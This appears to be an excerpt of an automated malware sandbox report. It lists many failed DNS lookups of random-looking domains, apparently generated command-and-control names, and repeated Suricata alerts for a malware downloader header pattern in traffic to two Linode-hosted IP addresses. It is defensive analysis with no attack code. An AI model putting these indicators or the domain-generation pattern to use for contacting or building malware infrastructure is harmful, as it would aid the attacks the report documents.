Source: unknownDNS traffic detected: query: mcesyrpjcoxcu.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: unmzmwhqqjn.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kvdvmc.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: jwimhacdt.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iksgub.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ipemvw.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: chafwe.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: exmqudoi.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yiqqmjekm.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mokurs.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wcwxa.ws replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qodpaim.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: eqcdijeomajywh.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bgrauma.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gdogxorcsmzygq.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wuduqoeivyo.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cjzhc.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kuikdooag.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: znful.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wheasiwvsew.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dekso.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oukpcbtqgqwoa.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kccsaqgsvsa.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ovonq.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: elymkl.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rmydkqgvcvhez.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mnaudewcuibyam.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qhncbseaikqo.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cgengcwnm.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rujygesrs.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: akpzumsigtkmmw.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: umoezuoxkf.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: owzuhlkauoavrg.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imctsikhqfmox.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dqagvyickrk.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ysbgwpqywiujo.ph replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: igdqs.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: canqk.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iceqeuhpebkqmj.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iyeyuemksorve.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ukikcexuo.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hyuyvkcxdqtqwe.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kuchksikknk.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: quzgmnyiqyqoez.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yebwfcrq.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zaspgiv.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssgum.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: eimef.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iefcm.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qsqwieaqy.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xugukhmkcsvw.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kamqc.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iuzmbo.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gmomhogqcqo.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ecumwls.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dqeqoagqqqrc.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uesvxrdym.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xytag.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uryaqqyx.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mtvjuwi.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ulwbq.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mauzahxbhdyxg.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: audewc.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qdukhasgmus.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gekaeekv.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fbkzqsqod.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kcscgoyucqmkq.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ylmed.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oooaehqkyge.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uwkmq.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mpdiexrzqka.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ahieeic.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kuhoi.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ihigogb.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nnwivnbqu.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rivawyyqgqsd.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: igeeqesxawmwom.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lhorellqnmqnh.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qaeebwmdz.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yfcalywej.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kikcvucesim.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: owayaiofn.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cwgbto.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ioiqqswzikfqu.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: taesmoqeisc.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: niror.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zmiqslgt.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: btnmut.ph replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: pwoawmujdqwzs.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xqeappl.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kowrxnw.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hvvgycugwh.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iftwbsbhi.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cmujuqlmdkg.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wfnsamu.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ggaksi.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: daqpka.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qcqdo.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gmbcqqwly.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nuijfgm.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bgneigegyqofu.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yxnavcmgurrhw.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: loucml.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kcvsysu.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cczqvvmimawca.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ywynxne.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: raqumygq.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pdrwqa.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wkuzdqsoiwy.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: arpjmckwt.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dqfudtqqvpha.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oxcua.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gimamgpmfgycu.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yuyoyuv.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uwygduzzqaosv.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oymyeynqyqewcs.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: oigqdcmjr.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gmxmotaygsg.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: sgfpiiwog.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xrkwbwyqovesj.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ithzdymit.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uutgmfehaouhp.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qqemsidggcmy.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: goejwtwioknhq.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mdabyu.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nukeecapkuanq.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: owpuc.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yktgacfquni.cg replaycode: Name error (3)
Source: unknownDNS traffic detected: query: eymkhoeguh.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xnzakgk.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: aynyrapy.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gyjdfapyghm.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: eksogaqiy.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: eiluyai.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kpntwewjtai.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kwfciphqs.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nswqqljcwe.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: menrzwzda.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: blqcoo.rw replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uduywyte.st replaycode: Name error (3)
Source: unknownDNS traffic detected: query: numuqgoyj.nu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: udelwggnpcs.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uvwabzkyifixf.tk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: useeru.cm replaycode: Name error (3)
Source: unknownDNS traffic detected: query: okocqpi.tk replaycode: Name error (3)
Source: unknownNetwork traffic detected: DNS query count 218
Source: global trafficDNS traffic detected: number of DNS queries: 218
Source: Joe Sandbox ViewIP Address: 64.70.19.203 64.70.19.203
Source: Joe Sandbox ViewIP Address: 64.70.19.203 64.70.19.203
Source: Joe Sandbox ViewIP Address: 172.234.222.138 172.234.222.138
Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:49717 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:49730 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:60144 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:49727 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:49714 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:60156 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:60159 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61365 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:49720 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:49723 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61377 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61396 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61362 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61489 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:60150 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:60147 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61383 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61420 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61386 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61390 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:60153 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61356 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:49711 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61399 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61426 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61495 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61402 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61405 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61359 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61435 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61480 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61450 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61414 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56468 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61465 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61504 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61432 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61353 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55706 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61477 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61371 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61438 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55703 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55736 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61486 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56444 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61447 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61471 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61408 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61429 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55718 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61417 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56501 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61444 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61380 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61441 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61393 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55700 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61368 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56441 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55475 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61374 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61430 -> 45.79.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55712 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61459 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61448 -> 45.79.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61456 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61492 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61498 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56480 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55721 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56504 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61522 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61474 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61501 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55709 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61510 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61462 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56525 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61483 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61519 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56474 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55739 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56462 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56438 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55730 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56465 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56450 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55724 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:62902 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56477 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56471 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56459 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56516 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61411 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56507 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56522 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61513 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:62908 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56510 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56456 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61453 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61516 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61507 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56495 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56519 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61468 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61423 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55742 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:56498 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:55745 -> 172.234.222.138:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:61525 -> 172.234.222.138:80
